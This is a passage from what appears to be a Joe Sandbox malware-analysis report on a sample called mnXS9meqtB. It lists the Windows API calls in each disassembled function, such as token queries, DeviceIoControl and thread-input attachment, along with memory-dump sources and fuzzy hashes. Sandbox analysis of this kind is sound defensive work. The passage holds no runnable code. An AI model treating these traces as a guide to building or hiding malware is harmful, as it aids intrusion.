• API ID: ErrorLastacceptselect
• String ID:
• API String ID: 385091864-0
• Opcode ID: 4bb79856caf2edec0e3bda3568f54708329db9899e8a7e4e72e1d06e0f32b822
• Instruction ID: 56333d6753bb9af978cb4e10818a0b982ba13d320fa6ca8ae1b368c969af1190
• Opcode Fuzzy Hash: 4bb79856caf2edec0e3bda3568f54708329db9899e8a7e4e72e1d06e0f32b822
• Instruction Fuzzy Hash: B5216372A001249FC7169F69C885EDEBBECEF49350F0041AAF849EB291DB749A458F90
APIs
  • Part of subcall function 00341E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00340ABB,?,?,?,0034187A,00000000,000000EF,00000119,?,?), ref: 00341E77
  • Part of subcall function 00341E68: lstrcpyW.KERNEL32(00000000,?,?,00340ABB,?,?,?,0034187A,00000000,000000EF,00000119,?,?,00000000), ref: 00341E9D
  • Part of subcall function 00341E68: lstrcmpiW.KERNEL32(00000000,?,00340ABB,?,?,?,0034187A,00000000,000000EF,00000119,?,?), ref: 00341ECE
• lstrlenW.KERNEL32(?,00000002,?,?,?,?,0034187A,00000000,000000EF,00000119,?,?,00000000), ref: 00340AD4
• lstrcpyW.KERNEL32(00000000,?,?,0034187A,00000000,000000EF,00000119,?,?,00000000), ref: 00340AFA
• lstrcmpiW.KERNEL32(00000002,cdecl,?,0034187A,00000000,000000EF,00000119,?,?,00000000), ref: 00340B2E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
• Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
Similarity
• API ID: lstrcmpilstrcpylstrlen
• String ID: cdecl
• API String ID: 4031866154-3896280584
• Opcode ID: bdcdbbbf024ade73c8379739a23b185c9f56149229d242c00601302e12fd8aa2
• Instruction ID: 45bccef1d78b20b56ca1423ea7b41fad058e8f4afb149901dba033fc7bb096f9
• Opcode Fuzzy Hash: bdcdbbbf024ade73c8379739a23b185c9f56149229d242c00601302e12fd8aa2
• Instruction Fuzzy Hash: C911B43A200305AFDB2A9F74DC45D7A77E8FF45354B80416AE906CF2A0EB71E851C7A4
APIs
• _free.LIBCMT ref: 00332FB5
  • Part of subcall function 0032395C: __FF_MSGBANNER.LIBCMT ref: 00323973
  • Part of subcall function 0032395C: __NMSG_WRITE.LIBCMT ref: 0032397A
  • Part of subcall function 0032395C: RtlAllocateHeap.NTDLL(00D00000,00000000,00000001,00000001,00000000,?,?,0031F507,?,0000000E), ref: 0032399F
Memory Dump Source
• Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
• Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
Similarity
• API ID: AllocateHeap_free
• String ID:
• API String ID: 614378929-0
• Opcode ID: 4648cdea1f444e04728b49690bbc0d3ec3f454a9a34d97a5075ccc95bade8daf
• Instruction ID: 1bce64979f35956ff5ff7a1effdc17f969968cfc0ef5c708f1dbbd20d8b931c1
• Opcode Fuzzy Hash: 4648cdea1f444e04728b49690bbc0d3ec3f454a9a34d97a5075ccc95bade8daf
• Instruction Fuzzy Hash: FD11AC31509231ABDB373F74BC85A6A3BACBF14360F218525F849DE161DB74CD409790
APIs
• _memset.LIBCMT ref: 0031EBB2
  • Part of subcall function 003051AF: _memset.LIBCMT ref: 0030522F
  • Part of subcall function 003051AF: _wcscpy.LIBCMT ref: 00305283
  • Part of subcall function 003051AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00305293
• KillTimer.USER32(?,00000001,?,?), ref: 0031EC07
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0031EC16
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00373C88
Memory Dump Source
• Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
• Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
Similarity
• API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
• String ID:
• API String ID: 1378193009-0
• Opcode ID: 5e44b4b62673d3bd719532f2c15b6286be7583908b35209677328ca265714a15
• Instruction ID: c434efabc05a87d8cbe40e368d6ad201c7c9498936f7a877a603c268838911d2
• Opcode Fuzzy Hash: 5e44b4b62673d3bd719532f2c15b6286be7583908b35209677328ca265714a15
• Instruction Fuzzy Hash: 8C21F674904794AFE7379B28CC59FE7BFEC9B05308F05048DE68E6A282C3752A84DB51
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 003405AC
• LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 003405C7
• RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 003405DD
• FreeLibrary.KERNEL32(?), ref: 00340632
Memory Dump Source
• Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
• Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
Similarity
• API ID: Type$FileFreeLibraryLoadModuleNameRegister
• String ID:
• API String ID: 3137044355-0
• Opcode ID: 7959393a54a0fc2d4256816b315818988b2b9376e8dc37491e8eb6a9db8637ad
• Instruction ID: b000c8599123cf56a9bb37d0f737255605e9847a6bfae129529bc904d5ee3847
• Opcode Fuzzy Hash: 7959393a54a0fc2d4256816b315818988b2b9376e8dc37491e8eb6a9db8637ad
• Instruction Fuzzy Hash: 5E215971A00209ABDB269F95DC88ADABBFCEF40700F0184A9A6179A050DB78FA559B50
APIs
• CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00346733
• _memset.LIBCMT ref: 00346754
• DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 003467A6
• CloseHandle.KERNEL32(00000000), ref: 003467AF
Memory Dump Source
• Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
• Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
Similarity
• API ID: CloseControlCreateDeviceFileHandle_memset
• String ID:
• API String ID: 1157408455-0
• Opcode ID: d0f5c0fc5bf937b906e6d2c48c215d901afe91168b90c3ebccb7ba41fec7f390
• Instruction ID: 683b390c0cef7fd557a4ad6aeddd09d594ffde6d66d45f14da17e0f52976e091
• Opcode Fuzzy Hash: d0f5c0fc5bf937b906e6d2c48c215d901afe91168b90c3ebccb7ba41fec7f390
• Instruction Fuzzy Hash: 8A110A759012287AE7316BA5AC4DFABBBBCEF45724F1041DAF504E71D0D2705E808B65
APIs
  • Part of subcall function 0033AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0033AA79
  • Part of subcall function 0033AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0033AA83
  • Part of subcall function 0033AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0033AA92
  • Part of subcall function 0033AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0033AA99
  • Part of subcall function 0033AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0033AAAF
• GetLengthSid.ADVAPI32(?,00000000,0033ADE4,?,?), ref: 0033B21B
• GetProcessHeap.KERNEL32(00000008,00000000), ref: 0033B227
• HeapAlloc.KERNEL32(00000000), ref: 0033B22E
• CopySid.ADVAPI32(?,00000000,?), ref: 0033B247
Memory Dump Source
• Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
• Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
Similarity
• API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
• String ID:
• API String ID: 4217664535-0
• Opcode ID: 299cb1670b74124e37cc6b14bf050bc2201b63883a1c054a5b82a8a756e3052d
• Instruction ID: c0095493a2689f7cff1629595df72ec9ed69400c259119ba5808d3f5b1cf8b7a
• Opcode Fuzzy Hash: 299cb1670b74124e37cc6b14bf050bc2201b63883a1c054a5b82a8a756e3052d
• Instruction Fuzzy Hash: FF119DB1A00205AFCB069F94DC84AAFF7A9EF84314F14846EEA42D7250D731AE44CB10
APIs
• SendMessageW.USER32(?,000000B0,?,?), ref: 0033B498
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 0033B4AA
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 0033B4C0
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 0033B4DB
Memory Dump Source
• Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
• Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: b01ba297d08eebaa7f8c0ca121c655e7904eafee28d0025a477724a89ea3a3a0
• Instruction ID: b080ceec46d0316d25ad50b6b52d1f53565d2380b7353ddc7945d2d39644fe6a
• Opcode Fuzzy Hash: b01ba297d08eebaa7f8c0ca121c655e7904eafee28d0025a477724a89ea3a3a0
• Instruction Fuzzy Hash: 25115A7A900218FFDB11DFA9C981E9DFBB8FB08700F204091E604B7290D771AE10DB94
APIs
  • Part of subcall function 0031B34E: GetWindowLongW.USER32(?,000000EB), ref: 0031B35F
• DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0031B5A5
• GetClientRect.USER32(?,?), ref: 0037E69A
• GetCursorPos.USER32(?), ref: 0037E6A4
• ScreenToClient.USER32(?,?), ref: 0037E6AF
Memory Dump Source
• Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
• Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
Similarity
• API ID: Client$CursorLongProcRectScreenWindow
• String ID:
• API String ID: 4127811313-0
• Opcode ID: f711ef5cba15f242d4a27ad8d86e35ff47e2b2f04e842ca1b15852c10c54f470
• Instruction ID: 79867d2e9296543633e620b4240c41c194e1822dde17ad725a82320f60c5a6e4
• Opcode Fuzzy Hash: f711ef5cba15f242d4a27ad8d86e35ff47e2b2f04e842ca1b15852c10c54f470
• Instruction Fuzzy Hash: 27113631900129BBCB16DF94D8459EEB7BDEB0A304F104495E901E7141D334AA91DBA1
APIs
• GetCurrentThreadId.KERNEL32 ref: 00347352
• MessageBoxW.USER32(?,?,?,?), ref: 00347385
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0034739B
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 003473A2
Memory Dump Source
• Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
• Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
Similarity
• API ID: CloseCurrentHandleMessageObjectSingleThreadWait
• String ID:
• API String ID: 2880819207-0
• Opcode ID: 8656b9aa61772d131841636c8ed18f6cb615c476bfdb952d7a6d52fd6fa81942
• Instruction ID: abc4b2b786a8f83ec261b0dbedea95287aeba34274df288fee32b51cfc8030d4
• Opcode Fuzzy Hash: 8656b9aa61772d131841636c8ed18f6cb615c476bfdb952d7a6d52fd6fa81942
• Instruction Fuzzy Hash: 7D11A176A04214ABCB039FACDC09E9E7BED9B49310F148255F925D72A1D770AE009BA1
                                                                            APIs
                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0031D1BA
                                                                            • GetStockObject.GDI32(00000011), ref: 0031D1CE
                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 0031D1D8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: CreateMessageObjectSendStockWindow
                                                                            • String ID:
                                                                            • API String ID: 3970641297-0
                                                                            • Opcode ID: f1c3de79d06874752acdb2819695c5bd8d61794666a4df43feae455eb4125df1
                                                                            • Instruction ID: 6a53a87e4b393a2c0286cac04008541c96600de7e52fdbb5c0a56c8236609427
                                                                            • Opcode Fuzzy Hash: f1c3de79d06874752acdb2819695c5bd8d61794666a4df43feae455eb4125df1
                                                                            • Instruction Fuzzy Hash: 7A118B72101609BFEB574F909C54EEABB6DFF0A364F054121FA0552050C731DCA0ABA0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                            • String ID:
                                                                            • API String ID: 3016257755-0
                                                                            • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                            • Instruction ID: ee358b9a143e8d108e0fb1708a75722a5a0ba282c0a45a2f15ade0c3fba16749
                                                                            • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                            • Instruction Fuzzy Hash: D101483600014ABBCF135F84DC818EE3F26BB18351F598555FA2859131D336EAB2AB81
                                                                            APIs
                                                                              • Part of subcall function 00327A0D: __getptd_noexit.LIBCMT ref: 00327A0E
                                                                            • __lock.LIBCMT ref: 0032748F
                                                                            • InterlockedDecrement.KERNEL32(?), ref: 003274AC
                                                                            • _free.LIBCMT ref: 003274BF
                                                                            • InterlockedIncrement.KERNEL32(00D26D80), ref: 003274D7
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                            • String ID:
                                                                            • API String ID: 2704283638-0
                                                                            • Opcode ID: 5ce83c2f97fa5bf4623f83223e66ca9e7bc61c719a8d183ca091988d3ac96937
                                                                            • Instruction ID: c3b36b89f0b73afb9178f3349d41a33ec19dff5e1fd9f1922264df0735116963
                                                                            • Opcode Fuzzy Hash: 5ce83c2f97fa5bf4623f83223e66ca9e7bc61c719a8d183ca091988d3ac96937
                                                                            • Instruction Fuzzy Hash: 6201B536909F31ABC723BF66B90675DBB64BF04714F164109F818ABA91CB346941CFD2
                                                                            APIs
                                                                              • Part of subcall function 0031AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0031AFE3
                                                                              • Part of subcall function 0031AF83: SelectObject.GDI32(?,00000000), ref: 0031AFF2
                                                                              • Part of subcall function 0031AF83: BeginPath.GDI32(?), ref: 0031B009
                                                                              • Part of subcall function 0031AF83: SelectObject.GDI32(?,00000000), ref: 0031B033
                                                                            • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0036EA8E
                                                                            • LineTo.GDI32(00000000,?,?), ref: 0036EA9B
                                                                            • EndPath.GDI32(00000000), ref: 0036EAAB
                                                                            • StrokePath.GDI32(00000000), ref: 0036EAB9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                            • String ID:
                                                                            • API String ID: 1539411459-0
                                                                            • Opcode ID: 557a6a8e49d7bf007a62e7c8da6b3f289a059bc6a563c0ab5bec376da4cbeda7
                                                                            • Instruction ID: 2eebdf71a597ecfc0389686751f2bdcfec5b39bc7dff5ac9f977c8c9c51ad701
                                                                            • Opcode Fuzzy Hash: 557a6a8e49d7bf007a62e7c8da6b3f289a059bc6a563c0ab5bec376da4cbeda7
                                                                            • Instruction Fuzzy Hash: 85F05E31005259BBDB13AF94AC0DFCA3F1EAF06311F044241FE11A50E187745666DB95
                                                                            APIs
                                                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0033C84A
                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0033C85D
                                                                            • GetCurrentThreadId.KERNEL32 ref: 0033C864
                                                                            • AttachThreadInput.USER32(00000000), ref: 0033C86B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                            • String ID:
                                                                            • API String ID: 2710830443-0
                                                                            • Opcode ID: bf7fb2051733017cd41370bcdd9989575c14191999cbd2f6b5f555f725d81ad2
                                                                            • Instruction ID: 062db5dbacc9e329ebd6affd11cddd2c4248528570b08009fdff99ac1cd71fc3
                                                                            • Opcode Fuzzy Hash: bf7fb2051733017cd41370bcdd9989575c14191999cbd2f6b5f555f725d81ad2
                                                                            • Instruction Fuzzy Hash: CCE06D71141328BADB221BA2DC4DEDB7F1CEF067A1F408061B60D984A1D6B1C681CBE0
                                                                            APIs
                                                                            • GetCurrentThread.KERNEL32 ref: 0033B0D6
                                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,0033AC9D), ref: 0033B0DD
                                                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0033AC9D), ref: 0033B0EA
                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,0033AC9D), ref: 0033B0F1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentOpenProcessThreadToken
                                                                            • String ID:
                                                                            • API String ID: 3974789173-0
                                                                            • Opcode ID: 39ff15dfa035e89d9af8f36bd42ec2ed675965b8d5c8658d8cd4d1a781684f58
                                                                            • Instruction ID: 2ca799ccd3323272b605e66ff99362437aac9996e215966e95c67a67bb724a35
                                                                            • Opcode Fuzzy Hash: 39ff15dfa035e89d9af8f36bd42ec2ed675965b8d5c8658d8cd4d1a781684f58
                                                                            • Instruction Fuzzy Hash: 64E086726013119BD7212FB15C0CF477BADEF55795F128858F341DA0C0DB748401C761
                                                                            APIs
                                                                            • GetSysColor.USER32(00000008), ref: 0031B496
                                                                            • SetTextColor.GDI32(?,000000FF), ref: 0031B4A0
                                                                            • SetBkMode.GDI32(?,00000001), ref: 0031B4B5
                                                                            • GetStockObject.GDI32(00000005), ref: 0031B4BD
                                                                            • GetWindowDC.USER32(?,00000000), ref: 0037DE2B
                                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 0037DE38
                                                                            • GetPixel.GDI32(00000000,?,00000000), ref: 0037DE51
                                                                            • GetPixel.GDI32(00000000,00000000,?), ref: 0037DE6A
                                                                            • GetPixel.GDI32(00000000,?,?), ref: 0037DE8A
                                                                            • ReleaseDC.USER32(?,00000000), ref: 0037DE95
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                            • String ID:
                                                                            • API String ID: 1946975507-0
                                                                            • Opcode ID: b8a5130762fbe140af5f9f457e6792e30bc6bd64bef0e7c28faaa5339fe98fb2
                                                                            • Instruction ID: 282326b6ca48baec52cd76546d5191e8ee27ff2e16be12acb754efefc54a58e6
                                                                            • Opcode Fuzzy Hash: b8a5130762fbe140af5f9f457e6792e30bc6bd64bef0e7c28faaa5339fe98fb2
                                                                            • Instruction Fuzzy Hash: A8E0ED31100340AADF636B74EC4DBD87B26AF56335F14C6A6F669580E1C7754981DB11
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                            • String ID:
